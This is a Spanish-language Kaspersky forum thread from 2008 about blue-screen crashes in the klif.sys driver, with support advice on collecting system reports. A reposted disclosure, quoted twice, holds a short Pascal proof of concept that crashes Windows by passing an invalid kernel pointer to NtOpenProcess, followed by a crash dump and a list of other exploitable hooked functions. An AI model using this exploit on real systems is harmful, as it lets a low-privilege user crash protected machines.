Ayer estaba en el ordenador tan tranquilo cuando analizo un archivo que trajo mi ermano lo cual era un troyano ala mijita de eliminar el troyano me salto el siguiente pantallaso en el ordenador!!!
PANTALLASO !!
kilf.sys
la cosa esque volvi a encenderlo y ala mijita de nuevo al analizar zonas criticas + actualizar base de datos+ entarar internet!!
Este bug es debido a karpesky ya que busque el archivo!!!
kilf.sys esto da el pantallaso!!!
Saludos!!
Full Version: kaspersky internet segurity 7.0.325 [BUG]
Revisate este post: http://forum.kaspersky.com/index.php?showtopic=55651
Postea el getsystem info de tu equipo, sube también el fichero dump de Kaspersky para ver donde puedes tener el problema.
Los fallos conocidos son:
Para ser un bug le tiene que pasar a bastante gente, etc...
Te recomiendo abras un ticket de soporte en el helpdesk de Kaspersky, enviales la información de tu equipo, el pantallazo que te da, etc... para que ellos te ayuden a resolverlo.
Saludos
Postea el getsystem info de tu equipo, sube también el fichero dump de Kaspersky para ver donde puedes tener el problema.
Los fallos conocidos son:
QUOTE
Kaspersky Internet Security 7.0
Versión 7.0.1.325 Publicado: 12.02.2008
Problemas conocidos:
1. En ciertos casos, ocurren problemas con el componente Control parental durante el análisis heurístico de ciertos contenidos Web.
2. En ciertos casos pueden quedar vínculos a archivos infectados eliminados dentro del Registro después de operar en modo de desinfección avanzado.
3. En ciertos casos, la ventana de vista previa en Microsoft Office Outlook no modifica la línea Asunto cuando se detecta contenido no deseado al abrir un mensaje.
4. Posible congelación del programa de instalación en Microsoft Windows Vista cuando está establecida una conexión VPN. Para resolver este problema, recomendamos desconectar la conexión VPN hasta que termine la instalación del programa.
5. Si el control del tráfico SSL está activado, pueden aparecer problemas cuando se conecta a sitios que requieren comprobar el certificado cliente. Para resolver este problema, recomendamos agregar como exclusión el tráfico cifrado de las aplicaciones necesarias.
6. Cuando actualiza Microsoft Windows XP a Microsoft Windows Vista, es necesario desinstalar y reinstalar de nuevo la aplicación después de terminar la actualización.
7. Cuando actualiza de una versión a otra de Microsoft Windows Vista (de Home Basic a Ultimate, por ejemplo), debe ejecutar el procedimiento de restauración del programa.
8. No se pueden grabar Discos de rescate en soporte DVD.
9. En ciertos casos, Microsoft Windows Security Center no detecta Kaspersky Internet Security o lo muestra con un estado incorrecto.
Versión 7.0.1.325 Publicado: 12.02.2008
Problemas conocidos:
1. En ciertos casos, ocurren problemas con el componente Control parental durante el análisis heurístico de ciertos contenidos Web.
2. En ciertos casos pueden quedar vínculos a archivos infectados eliminados dentro del Registro después de operar en modo de desinfección avanzado.
3. En ciertos casos, la ventana de vista previa en Microsoft Office Outlook no modifica la línea Asunto cuando se detecta contenido no deseado al abrir un mensaje.
4. Posible congelación del programa de instalación en Microsoft Windows Vista cuando está establecida una conexión VPN. Para resolver este problema, recomendamos desconectar la conexión VPN hasta que termine la instalación del programa.
5. Si el control del tráfico SSL está activado, pueden aparecer problemas cuando se conecta a sitios que requieren comprobar el certificado cliente. Para resolver este problema, recomendamos agregar como exclusión el tráfico cifrado de las aplicaciones necesarias.
6. Cuando actualiza Microsoft Windows XP a Microsoft Windows Vista, es necesario desinstalar y reinstalar de nuevo la aplicación después de terminar la actualización.
7. Cuando actualiza de una versión a otra de Microsoft Windows Vista (de Home Basic a Ultimate, por ejemplo), debe ejecutar el procedimiento de restauración del programa.
8. No se pueden grabar Discos de rescate en soporte DVD.
9. En ciertos casos, Microsoft Windows Security Center no detecta Kaspersky Internet Security o lo muestra con un estado incorrecto.
Para ser un bug le tiene que pasar a bastante gente, etc...
Te recomiendo abras un ticket de soporte en el helpdesk de Kaspersky, enviales la información de tu equipo, el pantallazo que te da, etc... para que ellos te ayuden a resolverlo.
Saludos
Ok ya mande el report por lo visto ya ususarios an tenido este problema este bug esta desde la version 5.0!!!
xD no se a solucionado!!
Saludos en espera de respuestas!!!
xD no se a solucionado!!
Saludos en espera de respuestas!!!
QUOTE(davile @ 17.04.2008 11:09) 
Ok ya mande el report por lo visto ya ususarios an tenido este problema este bug esta desde la version 5.0!!!
xD no se a solucionado!!
Saludos en espera de respuestas!!!
xD no se a solucionado!!
Saludos en espera de respuestas!!!
Si verdaderamente ese problema esta desde la version 5.0... porque no han solucionado ese error... a como pregunta DAVILE...????????????
Saludos...
DUDA!!!
Buenos dias:
Es el primer caso que nos plantean con referencia al driver klif.sys por lo que para asegurar si se trata de un bug o de un caso aislado (provocado unicamente por las caracteristicas que posee su equipo) tendriamos que visualizar el "pantallazo" (no adjunto, por favor reenvienoslo) y realizar los siguientes pasos:
Descomprima el fichero adjunto (GetSystemInfo) y ejecute .exe. De esta forma podra enviarnos el informe que le genera por correo electronico y en el nos llegara un informe detallado de su maquina.
1. Descargar el fichero adjunto en la carpeta "MIS DOCUMENTOS"
2. Abrir el programa “Explorador de Windows” desde INICIO\PROGRAMAS\ACCESORIOS
3. Buscar el fichero descargado, GETSYSINFO, presionar con el boton derecho y clic en “Extract to”. Lo desempaquetamos en el mismo directorio "MIS DOCUMENTOS"
4. Doble clic en el fichero extraido GETSYSTEMINFO.EXE que como resultado dara un archivo llamado SYSINFO.TXT
5. Para mandarnos dicho fichero lo comprimiremos previamente. Boton derecho sobre el fichero SYSINFO.TXT, presionamos en “ADD TO ZIP…” y lo guardamos con el nombre SYS070306 en el mismo directorio.
6. Para enviarnoslo adjunta el fichero SYS070306.ZIP en un mensaje en contestacion a este correo
xD DE DONDE ME BAJO ESE FICHERO Descomprima el fichero adjunto (GetSystemInfo) !!!
Buenos dias:
Es el primer caso que nos plantean con referencia al driver klif.sys por lo que para asegurar si se trata de un bug o de un caso aislado (provocado unicamente por las caracteristicas que posee su equipo) tendriamos que visualizar el "pantallazo" (no adjunto, por favor reenvienoslo) y realizar los siguientes pasos:
Descomprima el fichero adjunto (GetSystemInfo) y ejecute .exe. De esta forma podra enviarnos el informe que le genera por correo electronico y en el nos llegara un informe detallado de su maquina.
1. Descargar el fichero adjunto en la carpeta "MIS DOCUMENTOS"
2. Abrir el programa “Explorador de Windows” desde INICIO\PROGRAMAS\ACCESORIOS
3. Buscar el fichero descargado, GETSYSINFO, presionar con el boton derecho y clic en “Extract to”. Lo desempaquetamos en el mismo directorio "MIS DOCUMENTOS"
4. Doble clic en el fichero extraido GETSYSTEMINFO.EXE que como resultado dara un archivo llamado SYSINFO.TXT
5. Para mandarnos dicho fichero lo comprimiremos previamente. Boton derecho sobre el fichero SYSINFO.TXT, presionamos en “ADD TO ZIP…” y lo guardamos con el nombre SYS070306 en el mismo directorio.
6. Para enviarnoslo adjunta el fichero SYS070306.ZIP en un mensaje en contestacion a este correo
xD DE DONDE ME BAJO ESE FICHERO Descomprima el fichero adjunto (GetSystemInfo) !!!
El Bug (Falla) de Kaspersky Antivirus!!
La informacion:
El antivirus Kaspersky, desde hace muchísimo tiempo sufre una vulnerabilidad
bastante peligrosa, que permite hacer un crash del sistema protegido por este antivirus, incluso desde la cuenta de invitado.-
Todos los intentos de avisar a Kaspersky Lab sobre esta vulnerabilidad han sido ignorados.- Este material fue hecho público varios años atrás (desde el 2.005), y en el último verano publicaron un nuevo "exploit" para
Kaspersky AV 6.0 el cual se basa en los descubrimientos previos de Ms-Rem.-
Y después de todo este tiempo, nada ha cambiado.- Aún ahora con la nueva
versión de Kaspersky AV 7.0 este exploit sigue funcionando muy bien.-
El objetivo principal de este exploit es hacer una llamada a NtOpenProcess con parámetros inválidos.- Esta función esta hookeada por el driver de Kaspersky llamado klif.sys y la razón para el hook es obvia (Esta es la manera en que Kaspersky AV se protege de accesos no autorizados que pudieran cerrar el proceso; esta es una práctica muy usada por diferentes tipos de rootkits y malwares).-
Este es el prototipo de la función:
Código:
NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL );
Y este es un pequeño exploit escrito en Pascal:
Código:
var
ob1: OBJECT_ATTRIBUTES;
p1: DWORD;
begin
ob1.Length := sizeof(ob1);
NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1,
pointer($82000000));
end;
Verificado en el driver klif.sys de la versión 6.12.10.280 y debe funcionar
también en las anteriores.-
Como se observa en el código, el último parámetro es la dirección de la
estructura CLIENT_ID, la cual apunta hacia una región aleatoria dentro de la
memoria del kernell.-
Si lanzamos el exploit en una instalación limpia de Windows XP, sin
Kaspersky AV, no hay BSOD(Blue Screen Of Death o Pantallazo Azul de
Windows).-
Si lanzamos el exploit en un Windows XP protegido por Kapersky AV 7.0
inmediatamente obtenemos un pantallazo azul con el mensaje
PAGE_FAULT_IN_NONPAGED_AREA.-
Te preguntarás ¿Por qué ocurre esto? La respuesta es muy sencilla.-
Supongo que el código fuente de el hook en NtOpenProcess es algo similar a esto:
Código:
NTSTATUS NewNtOpenProcess (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
__try
{
if (ClientId->UniqueProcess == KasperskyProcesss) return
STATUS_ACCESS_DENIED;
else return RealNtOpenProcess(ProcessHandle, DesiredAccess,
ObjectAttributes, ClientId);
__except (EXCEPTION_EXECUTE_HANDLER)
{
... stuff here ...
}
}
El gran error aquí es ClientId->UniqueProcess, ya que ClientId es un
PUNTERO a una estructura.- El hecho de acceder a una región inválida de
memoria produce inmediatamente un pantallazo azul con el mensaje
PAGE_FAULT_IN_NONPAGED_AREA.-
El exploit original creado por Ms-Rem en el 2.005 consiste en lo siguiente:
Código:
NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);
Ahora como podrás observar, los desarrolladores de Kaspersky AV han usado
un bloque try/except, y parece que desconocen otras funciones de handling.-
Esperemos que descubran el fabuloso programa llamado NtCall y corrijan su
bug:
Código:
* *
* Bugcheck Analysis *
* *
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe. Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: 83000000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory address.
Arg4: 00000000, (reserved)
Debugging Details:
ANALYSIS: Kernel with unknown size. Will force reload symbols with known
size.
ANALYSIS: Force reload command: .reload /f
ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.
***** Kernel symbols are WRONG. Please fix symbols to do analysis.
MODULE_NAME: klif
FAULTING_MODULE: 804d7000 nt
DEBUG_FLR_IMAGE_TIMESTAMP: 46260f1c
READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
83000000
FAULTING_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]
MM_INTERNAL_CODE: 0
CUSTOMER_CRASH_COUNT: 1
DEFAULT_BUCKET_ID: WRONG_SYMBOLS
BUGCHECK_STR: 0x50
LAST_CONTROL_TRANSFER: from f941b39a to f941840c
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may
be wrong.
f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c
f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a
f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94
f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00
f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4
STACK_COMMAND: kb
FOLLOWUP_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]
SYMBOL_STACK_INDEX: 0
FOLLOWUP_NAME: MachineOwner
IMAGE_NAME: klif.sys
SYMBOL_NAME: klif+1940c
BUCKET_ID: WRONG_SYMBOLS
Followup: MachineOwner
Algunos descubrimientos hechos por UG North muestran que hay otras
funciones que también están hookeadas por klif.sys las cuales pueden ser
explotadas con ataques similares.-
Lista de entradas en la SSDT (System Service Descriptor Table) explotables
(Windows XP con Kapersky AV 7.0.0.55):
==================================
|[Idx] [nombre de la función] |
==================================
|[41 ] NtCreateKey
|[47 ] NtCreateProcess
|[48 ] NtCreateProcessEx
|[50 ] NtCreateSection
|[52 ] NtCreateSymbolicLinkObject
|[53 ] NtCreateThread
|[65 ] NtDeleteValueKey
|[99 ] NtLoadKey2
|[119] NtOpenKey
|[122] NtOpenProcess
|[125] NtOpenSection
|[177] NtQueryValueKey
==================================
Cualquier llamada a esas funciones con parámetros invalidos, llevara a un
BSOD.-
Este tipo de exploit fue descubierto por Ms-Rem en el 2005 y funciona para
KAV 5.0.-
Como demuestra este exploit, funciona para todas la versiones de Kaspersky
Antivirus incluyendo la nueva versión Kaspersky AV 7.0.-
La informacion:
El antivirus Kaspersky, desde hace muchísimo tiempo sufre una vulnerabilidad
bastante peligrosa, que permite hacer un crash del sistema protegido por este antivirus, incluso desde la cuenta de invitado.-
Todos los intentos de avisar a Kaspersky Lab sobre esta vulnerabilidad han sido ignorados.- Este material fue hecho público varios años atrás (desde el 2.005), y en el último verano publicaron un nuevo "exploit" para
Kaspersky AV 6.0 el cual se basa en los descubrimientos previos de Ms-Rem.-
Y después de todo este tiempo, nada ha cambiado.- Aún ahora con la nueva
versión de Kaspersky AV 7.0 este exploit sigue funcionando muy bien.-
El objetivo principal de este exploit es hacer una llamada a NtOpenProcess con parámetros inválidos.- Esta función esta hookeada por el driver de Kaspersky llamado klif.sys y la razón para el hook es obvia (Esta es la manera en que Kaspersky AV se protege de accesos no autorizados que pudieran cerrar el proceso; esta es una práctica muy usada por diferentes tipos de rootkits y malwares).-
Este es el prototipo de la función:
Código:
NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL );
Y este es un pequeño exploit escrito en Pascal:
Código:
var
ob1: OBJECT_ATTRIBUTES;
p1: DWORD;
begin
ob1.Length := sizeof(ob1);
NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1,
pointer($82000000));
end;
Verificado en el driver klif.sys de la versión 6.12.10.280 y debe funcionar
también en las anteriores.-
Como se observa en el código, el último parámetro es la dirección de la
estructura CLIENT_ID, la cual apunta hacia una región aleatoria dentro de la
memoria del kernell.-
Si lanzamos el exploit en una instalación limpia de Windows XP, sin
Kaspersky AV, no hay BSOD(Blue Screen Of Death o Pantallazo Azul de
Windows).-
Si lanzamos el exploit en un Windows XP protegido por Kapersky AV 7.0
inmediatamente obtenemos un pantallazo azul con el mensaje
PAGE_FAULT_IN_NONPAGED_AREA.-
Te preguntarás ¿Por qué ocurre esto? La respuesta es muy sencilla.-
Supongo que el código fuente de el hook en NtOpenProcess es algo similar a esto:
Código:
NTSTATUS NewNtOpenProcess (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
__try
{
if (ClientId->UniqueProcess == KasperskyProcesss) return
STATUS_ACCESS_DENIED;
else return RealNtOpenProcess(ProcessHandle, DesiredAccess,
ObjectAttributes, ClientId);
__except (EXCEPTION_EXECUTE_HANDLER)
{
... stuff here ...
}
}
El gran error aquí es ClientId->UniqueProcess, ya que ClientId es un
PUNTERO a una estructura.- El hecho de acceder a una región inválida de
memoria produce inmediatamente un pantallazo azul con el mensaje
PAGE_FAULT_IN_NONPAGED_AREA.-
El exploit original creado por Ms-Rem en el 2.005 consiste en lo siguiente:
Código:
NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);
Ahora como podrás observar, los desarrolladores de Kaspersky AV han usado
un bloque try/except, y parece que desconocen otras funciones de handling.-
Esperemos que descubran el fabuloso programa llamado NtCall y corrijan su
bug:
Código:
* *
* Bugcheck Analysis *
* *
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe. Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: 83000000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory address.
Arg4: 00000000, (reserved)
Debugging Details:
ANALYSIS: Kernel with unknown size. Will force reload symbols with known
size.
ANALYSIS: Force reload command: .reload /f
ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.
***** Kernel symbols are WRONG. Please fix symbols to do analysis.
MODULE_NAME: klif
FAULTING_MODULE: 804d7000 nt
DEBUG_FLR_IMAGE_TIMESTAMP: 46260f1c
READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
83000000
FAULTING_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]
MM_INTERNAL_CODE: 0
CUSTOMER_CRASH_COUNT: 1
DEFAULT_BUCKET_ID: WRONG_SYMBOLS
BUGCHECK_STR: 0x50
LAST_CONTROL_TRANSFER: from f941b39a to f941840c
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may
be wrong.
f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c
f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a
f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94
f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00
f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4
STACK_COMMAND: kb
FOLLOWUP_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]
SYMBOL_STACK_INDEX: 0
FOLLOWUP_NAME: MachineOwner
IMAGE_NAME: klif.sys
SYMBOL_NAME: klif+1940c
BUCKET_ID: WRONG_SYMBOLS
Followup: MachineOwner
Algunos descubrimientos hechos por UG North muestran que hay otras
funciones que también están hookeadas por klif.sys las cuales pueden ser
explotadas con ataques similares.-
Lista de entradas en la SSDT (System Service Descriptor Table) explotables
(Windows XP con Kapersky AV 7.0.0.55):
==================================
|[Idx] [nombre de la función] |
==================================
|[41 ] NtCreateKey
|[47 ] NtCreateProcess
|[48 ] NtCreateProcessEx
|[50 ] NtCreateSection
|[52 ] NtCreateSymbolicLinkObject
|[53 ] NtCreateThread
|[65 ] NtDeleteValueKey
|[99 ] NtLoadKey2
|[119] NtOpenKey
|[122] NtOpenProcess
|[125] NtOpenSection
|[177] NtQueryValueKey
==================================
Cualquier llamada a esas funciones con parámetros invalidos, llevara a un
BSOD.-
Este tipo de exploit fue descubierto por Ms-Rem en el 2005 y funciona para
KAV 5.0.-
Como demuestra este exploit, funciona para todas la versiones de Kaspersky
Antivirus incluyendo la nueva versión Kaspersky AV 7.0.-
Sera que esa vulnerabilidad de kaspersky, la tenga la version 8 o que hayan reparando el error...???
Alguien ya probo eso en la version 8....???????????
Saludos...
Alguien ya probo eso en la version 8....???????????
Saludos...
por eso digo ese BUG tambien esta en la version 7.0 porque ami me a dado el pantallazo!!!
pero necesito saver esto Descomprima el fichero adjunto (GetSystemInfo) !!!
de donde??
pero necesito saver esto Descomprima el fichero adjunto (GetSystemInfo) !!!
de donde??
QUOTE(davile @ 18.04.2008 12:28)
por eso digo ese BUG tambien esta en la version 7.0 porque ami me a dado el pantallazo!!!
pero necesito saver esto Descomprima el fichero adjunto (GetSystemInfo) !!!
de donde??
pero necesito saver esto Descomprima el fichero adjunto (GetSystemInfo) !!!
de donde??
Disculpe... pero no le entiendo la pregunta...??
saludos...
Perdon me exprese mal que mande un report a karpesky y me dijeron:Descomprima el fichero adjunto (GetSystemInfo) y ejecute .exe. De esta forma podra enviarnos el informe que le genera por correo electronico y en el nos llegara un informe detallado de su maquina.
De donde me bajo ese fichero??
Saludos...
De donde me bajo ese fichero??
Saludos...
Hola
Checa esta pagina (en ingles) sobre como usar el GSI:
http://forum.kaspersky.com/index.php?showtopic=36444
Saludos
Checa esta pagina (en ingles) sobre como usar el GSI:
http://forum.kaspersky.com/index.php?showtopic=36444
Saludos
la info la sake del foro spiware!!!
Por lo que veo no soy el unico que la dado el pantallaso
Saludos...
Por lo que veo no soy el unico que la dado el pantallaso
Saludos...
Hola
Postea la informacion del Bug en el foro en ingles para que pueda ser vista por alguien de Kaspersky.
Saludos
Postea la informacion del Bug en el foro en ingles para que pueda ser vista por alguien de Kaspersky.
Saludos
QUOTE(davile @ 18.04.2008 14:02)
la info la sake del foro spiware!!!
Por lo que veo no soy el unico que la dado el pantallaso
Saludos...
Por lo que veo no soy el unico que la dado el pantallaso
Saludos...
Existe mucha info al respecto en google:
klif.sys
http://www.google.com.ni/search?hl=es&...oogle&meta=
NtCall
http://www.google.com.ni/search?hl=es&...ta=lr%3Dlang_es
Saludos...
QUOTE(kikesan @ 18.04.2008 14:07)
Hola
Postea la informacion del Bug en el foro en ingles para que pueda ser vista por alguien de Kaspersky.
Saludos
Postea la informacion del Bug en el foro en ingles para que pueda ser vista por alguien de Kaspersky.
Saludos
Entonces los señores de kaspersky solo visitan las seccion del foro pero en ingles... no existe nadie de los expertos de kaspersky que visiten el foro en español...???
No creo que los señores expertos de kaspersky no sepan de ese acontesimiento...
Saludos...
Estamos mezclando dos cosas:
Por un lado el pantallazo azul diciendo que ha fallado en el klif.sys.
Pueden ser varias cosas. Habría que ver el dump completo. Puede ser desde un fallo de Kis a un error en la memoria del equipo o unos drivers usb mal diseñados.
Este es un archivo importante en Kis que ha tenido muchas versiones. en ocasiones cambia en los hotfix.
Por otro lado está, la vulnerabilidad de NtOpenProcess. Fue reportada hace nueve meses y al poco tiempo fue corregida.
Más información:
http://www.kaspersky.com/technews?id=203038695
Saludos
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.